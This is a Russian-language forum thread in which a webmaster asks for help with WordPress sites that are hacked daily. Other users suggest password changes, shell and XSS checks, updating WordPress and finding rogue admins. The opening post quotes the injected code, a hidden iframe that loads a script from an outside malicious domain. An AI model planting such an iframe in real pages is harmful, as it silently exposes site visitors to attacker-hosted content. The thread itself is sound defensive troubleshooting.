Взлом wordpress, помогите пожалуйста!

12
BD
На сайте с 27.12.2007
Offline
143
B_D
1465

Ежедневно в мои сайты на wordpress кто-то или что-то вносит несколько изменений, в результате которых сайты перестают работать.

В файл index.php в корне вписывается такая строка (строки 16-18):

/** Loads the WordPress Environment and Template */

require('./wp-blog-

<div style="display:none"><iframe src="http://bio-free.ru:8080:8080/ts/in.cgi?rank" width=293 height=892 ></iframe></div>

Адрес htpp всегда разный. Аналогичные или похожие строки появляются еще в нескольких файлах каждого сайта.

Всего страдает 4 сайта. Все сайты на одном хост-аккаунте, пароль менял - не помогает. Доступ к файлам стоит - только чтение. Комп регулярно проверяю AVZ.

Что это может быть и как с ним бороться? Один сайт уже из индекса вылетел изза этого((

O
На сайте с 02.06.2006
Offline
67
#1

/ru/forum/381657

и тд

поиск - сила

Апокалипсис
На сайте с 02.11.2008
Offline
391
#2

Пароли к фтп меняйте.... разжевано сто раз ..

Записки нищего (http://zapiskinishego.ru) - мой личный блог Услуги php программиста. Очень нужна любая работа. Не покупают? Поведенческий аудит интернет-магазина за 5000 руб. (/ru/forum/990312)
[Удален]
#3
Апокалипсис:
Пароли к фтп меняйте.... разжевано сто раз ..

сказал же человек - СМЕНА ПАРОЛЕЙ НЕ ПОМОГАЕТ.

Поищи левые папки/файлы у себя на сайте. Либо тебе шелл залили, либо какую-то XSS нашли. И еще, зайди на mywordpress.ru и скачай плагины: один отслеживает какие-либо изменения в файлах, другой против XSS атак.

DyaDya
На сайте с 11.04.2007
Offline
147
#4

вар 1. Есть вероятность, что на сайт уже залит скрипт-троян. Смена пароля тогда не спасёт, пока его не найдёте и не удалите!

вар 2. Вероятно дырень в движке. Тогда нужно смотреть по логам веб-сервера, как происходит взлом. Тут лучше в тех поддержку хостинга обращаться.

Возможно, помогут мои рекомендации и скриптик.

p.s. Расскажите подробнее, как пароль меняете? Сохраняете новый пароль в фтп-клиенте?!

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
RAF
На сайте с 17.10.2006
Offline
71
RAF
#5

У меня тоже самое... блог аж блин выкинули из индекса. В футер.пхп появлялось до сотни невидимых ссылок.

мим
На сайте с 07.08.2009
Offline
13
#6

может быть shell?

mgarkunov
На сайте с 23.03.2009
Offline
130
#7

Для начала нужно обновиться до версии 2.8.4. так как до этой версии была дыра и можно было создать дополнительного админа.

Потом нужно проверить наличие дополнительных и незваных админов, но лучше это делать через базу, так как через интерфейс он может быть не виден.

Или можно попробовать поискать с помощью Wordpress Antivirus.

Dzhalalov
На сайте с 21.04.2009
Offline
19
#8

1. Меняйте все пароли

2. Установить WP новой версий

http://seolove.ru (http://seolove.ru) Форум о магии
Vladimir
На сайте с 07.06.2004
Offline
595
#9
mgarkunov:
Для начала нужно обновиться до версии 2.8.4. так как до этой версии была дыра и можно было создать дополнительного админа.
Потом нужно проверить наличие дополнительных и незваных админов, но лучше это делать через базу, так как через интерфейс он может быть не виден.
Или можно попробовать поискать с помощью Wordpress Antivirus.

Админов, новых не было видно. Но совет в обновлении правильный, помогло избавиться от незваных гостей.

Аэройога ( https://vk.com/aeroyogadom ) Йога в гамаках ( https://vk.com/aero_yoga ) Аэройога обучение ( https://aeroyoga.ru ) и просто фото ( https://weandworld.com )
BD
На сайте с 27.12.2007
Offline
143
B_D
#10

У меня стоят движки от 2.7.* до 2.8.4, ломаются все одинаково(

Пароль менял через админку хостера, сохранил в ворде.

Есть подозрение, что вирь у меня на компе, т.к. только что обнаружил аналогичную проблему еще на одном своем аккаунте.. Но AVZ ничего не находит.

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий